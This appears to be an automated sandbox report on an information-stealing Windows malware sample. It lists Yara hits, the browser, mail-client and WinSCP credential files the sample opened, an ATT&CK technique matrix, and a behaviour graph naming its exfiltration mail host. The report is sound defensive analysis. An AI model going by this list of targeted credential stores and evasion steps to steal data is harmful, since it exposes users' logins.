                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeQueries volume information: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.45cda10.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.45cda10.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.4592df0.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1678075288.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.4073894024.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1678075288.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.4073894024.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.4073894024.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe PID: 6552, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7264, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: jYRIGnZlROed.exe PID: 7360, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7644, type: MEMORYSTR
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.32ea6c4.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.31ae900.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.31ae900.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.32e96ac.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.31be918.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.32ec6dc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.31be918.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1662329813.00000000032CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1695168637.00000000031BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1695168637.000000000317B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1667293685.0000000007D80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1662329813.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1662329813.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1662329813.0000000003308000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.45cda10.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.45cda10.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.4592df0.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1678075288.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.4073894024.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe PID: 6552, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7264, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: jYRIGnZlROed.exe PID: 7360, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7644, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.45cda10.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.45cda10.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.4592df0.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1678075288.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.4073894024.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1678075288.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.4073894024.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.4073894024.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe PID: 6552, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7264, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: jYRIGnZlROed.exe PID: 7360, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7644, type: MEMORYSTR
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.32ea6c4.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.31ae900.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.31ae900.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.32e96ac.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.31be918.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.32ec6dc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.jYRIGnZlROed.exe.31be918.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1662329813.00000000032CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1695168637.00000000031BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1695168637.000000000317B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1667293685.0000000007D80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1662329813.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1662329813.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1662329813.0000000003308000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        11
                        Disable or Modify Tools
                        1
                        OS Credential Dumping
                        1
                        File and Directory Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job
                        1
                        Scheduled Task/Job
                        11
                        Process Injection
                        1
                        Deobfuscate/Decode Files or Information
                        21
                        Input Capture
                        24
                        System Information Discovery
                        Remote Desktop Protocol1
                        Data from Local System
                        11
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        Scheduled Task/Job
                        2
                        Obfuscated Files or Information
                        1
                        Credentials in Registry
                        211
                        Security Software Discovery
                        SMB/Windows Admin Shares1
                        Email Collection
                        1
                        Non-Standard Port
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook32
                        Software Packing
                        NTDS1
                        Process Discovery
                        Distributed Component Object Model21
                        Input Capture
                        2
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading
                        LSA Secrets141
                        Virtualization/Sandbox Evasion
                        SSH1
                        Clipboard Data
                        23
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading
                        Cached Domain Credentials1
                        Application Window Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                        Virtualization/Sandbox Evasion
                        DCSync1
                        System Network Configuration Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                        Process Injection
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1398430 Sample: SecuriteInfo.com.Variant.La... Startdate: 25/02/2024 Architecture: WINDOWS Score: 100 40 mail.elec-qatar.com 2->40 42 fp2e7a.wpc.phicdn.net 2->42 44 2 other IPs or domains 2->44 50 Snort IDS alert for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 13 other signatures 2->56 8 SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe 7 2->8         started        12 jYRIGnZlROed.exe 5 2->12         started        signatures3 process4 file5 36 C:\Users\user\AppData\...\jYRIGnZlROed.exe, PE32 8->36 dropped 38 C:\Users\user\AppData\Local\...\tmp919E.tmp, XML 8->38 dropped 58 Detected unpacking (changes PE section rights) 8->58 60 Uses schtasks.exe or at.exe to add and modify task schedules 8->60 62 Adds a directory exclusion to Windows Defender 8->62 14 MSBuild.exe 15 2 8->14         started        18 MSBuild.exe 8->18         started        20 powershell.exe 21 8->20         started        26 2 other processes 8->26 64 Multi AV Scanner detection for dropped file 12->64 66 Machine Learning detection for dropped file 12->66 22 MSBuild.exe 12->22         started        24 schtasks.exe 1 12->24         started        signatures6 process7 dnsIp8 46 mail.elec-qatar.com 50.87.139.143, 49735, 49739, 587 UNIFIEDLAYER-AS-1US United States 14->46 48 api.ipify.org 104.26.13.205, 443, 49734, 49738 CLOUDFLARENETUS United States 14->48 68 Queries sensitive network adapter information (via WMI, 